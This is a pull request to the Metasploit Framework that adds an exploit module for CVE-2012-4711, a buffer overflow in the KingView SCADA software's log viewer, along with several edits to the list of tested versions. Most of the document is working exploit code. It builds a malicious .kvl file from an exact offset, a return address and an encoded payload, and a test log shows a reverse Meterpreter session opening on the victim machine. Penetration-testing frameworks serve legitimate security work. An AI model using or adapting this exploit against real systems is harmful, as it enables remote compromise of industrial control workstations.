### PR TITLE
Added module for CVE-2012-4711

### DIFF
--- a/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb
+++ b/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb
@@ -20,7 +20,8 @@ class Metasploit3 < Msf::Exploit::Remote
 				the KingMess.exe application when handling log files, due to the insecure usage of
 				sprintf. This module uses a malformed .kvl file which must be opened by the victim
 				via the KingMess.exe application, through the 'Browse Log Files' option. The module
-				has been tested successfully on KingView 6.52 over Windows XP SP3.
+				has been tested successfully on KingView 6.52 and KingView 6.53 Free Trial over
+				Windows XP SP3.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>
@@ -50,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
-					[ 'KingView 6.52 English / Kingmess.exe 65.20.2003.10300 / Windows XP SP3',
+					[ 'KingView 6.52 English / KingView 6.53 Free Trial / Kingmess.exe 65.20.2003.10300 / Windows XP SP3',
 						{
 							'Offset' => 295,
 							'Ret'    => 0x77c35459 # push esp # ret # msvcrt.dll

--- a/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb
+++ b/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb
@@ -20,8 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				the KingMess.exe application when handling log files, due to the insecure usage of
 				sprintf. This module uses a malformed .kvl file which must be opened by the victim
 				via the KingMess.exe application, through the 'Browse Log Files' option. The module
-				has been tested successfully on KingView 6.52 and KingView 6.53 over Windows XP
-				SP3.
+				has been tested successfully on KingView 6.52 over Windows XP SP3.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>

--- a/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb
+++ b/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb
@@ -51,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
-					[ 'KingView 6.52 English / KingView 6.53 Demo English / Kingmess.exe 65.20.2003.10300 / Windows XP SP3',
+					[ 'KingView 6.52 English / KingView 6.53 Free Trial English / Kingmess.exe 65.20.2003.10300 / Windows XP SP3',
 						{
 							'Offset' => 295,
 							'Ret'    => 0x77c35459 # push esp # ret # msvcrt.dll

--- a/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb
+++ b/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb
@@ -51,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
-					[ 'KingView 6.52 English / KingView 6.53 Free Trial English / Kingmess.exe 65.20.2003.10300 / Windows XP SP3',
+					[ 'KingView 6.52 English / Kingmess.exe 65.20.2003.10300 / Windows XP SP3',
 						{
 							'Offset' => 295,
 							'Ret'    => 0x77c35459 # push esp # ret # msvcrt.dll

--- a/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb
+++ b/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb
@@ -1,0 +1,86 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::FILEFORMAT
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "KingView Log File Parsing Buffer Overflow",
+			'Description'    => %q{
+					This module exploits a vulnerability found in KingView <= 6.55. It exists in
+				the KingMess.exe application when handling log files, due to the insecure usage of
+				sprintf. This module uses a malformed .kvl file which must be opened by the victim
+				via the KingMess.exe application, through the 'Browse Log Files' option. The module
+				has been tested successfully on KingView 6.52 and KingView 6.53 over Windows XP
+				SP3.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Lucas Apa', # Vulnerability discovery
+					'Carlos Mario Penagos Hollman', # Vulnerability discovery
+					'juan vazquez' # Metasploit module
+				],
+			'References'     =>
+				[
+					['CVE', '2012-4711'],
+					['OSVDB', '89690'],
+					['BID', '57909'],
+					['URL', 'http://ics-cert.us-cert.gov/pdf/ICSA-13-043-02.pdf']
+				],
+			'Payload'        =>
+				{
+					'Space'          => 1408,
+					'DisableNops'    => true,
+					'BadChars'       => "\x00\x0a\x0d",
+					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+				},
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process'
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'KingView 6.52 English / KingView 6.53 Demo English / Kingmess.exe 65.20.2003.10300 / Windows XP SP3',
+						{
+							'Offset' => 295,
+							'Ret'    => 0x77c35459 # push esp # ret # msvcrt.dll
+						}
+					]
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => "Nov 20 2012",
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				OptString.new('FILENAME', [true, 'The filename', 'msf.kvl'])
+			], self.class)
+	end
+
+	def exploit
+		version = "6.00"
+		version << "\x00" * (0x90 - version.length)
+		entry = "\xdd\x07\x03\x00\x03\x00\x0d\x00\x0c\x00\x31\x00\x38\x00\xd4\x01"
+		entry << rand_text_alpha(target['Offset'])
+		entry << [target.ret].pack("V")
+		entry << rand_text_alpha(16)
+		entry << payload.encoded
+
+		kvl_file = version
+		kvl_file << entry
+
+		file_create(kvl_file)
+	end
+end
+


### PR DESCRIPTION
- With kingview 6.52 English as downloaded from:

http://www.kingview.com/download/index.aspx (Registration required)

MD5 (kingview6.52_63.5MB.rar) = 1c069edc716d24d779bcb94a5f43d58c

Test:

```

msf  exploit(handler) > use exploit/windows/fileformat/kingview_kingmess_kvl 
msf  exploit(kingview_kingmess_kvl) > rexploit
[*] Reloading module...

[+] msf.kvl stored at /Users/juan/.msf4/local/msf.kvl
msf  exploit(kingview_kingmess_kvl) > use exploit/multi/handler 
msf  exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.134
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.134:1042) at 2013-03-13 19:59:46 +0100

meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.134 - Meterpreter session 1 closed.  Reason: User exit

```
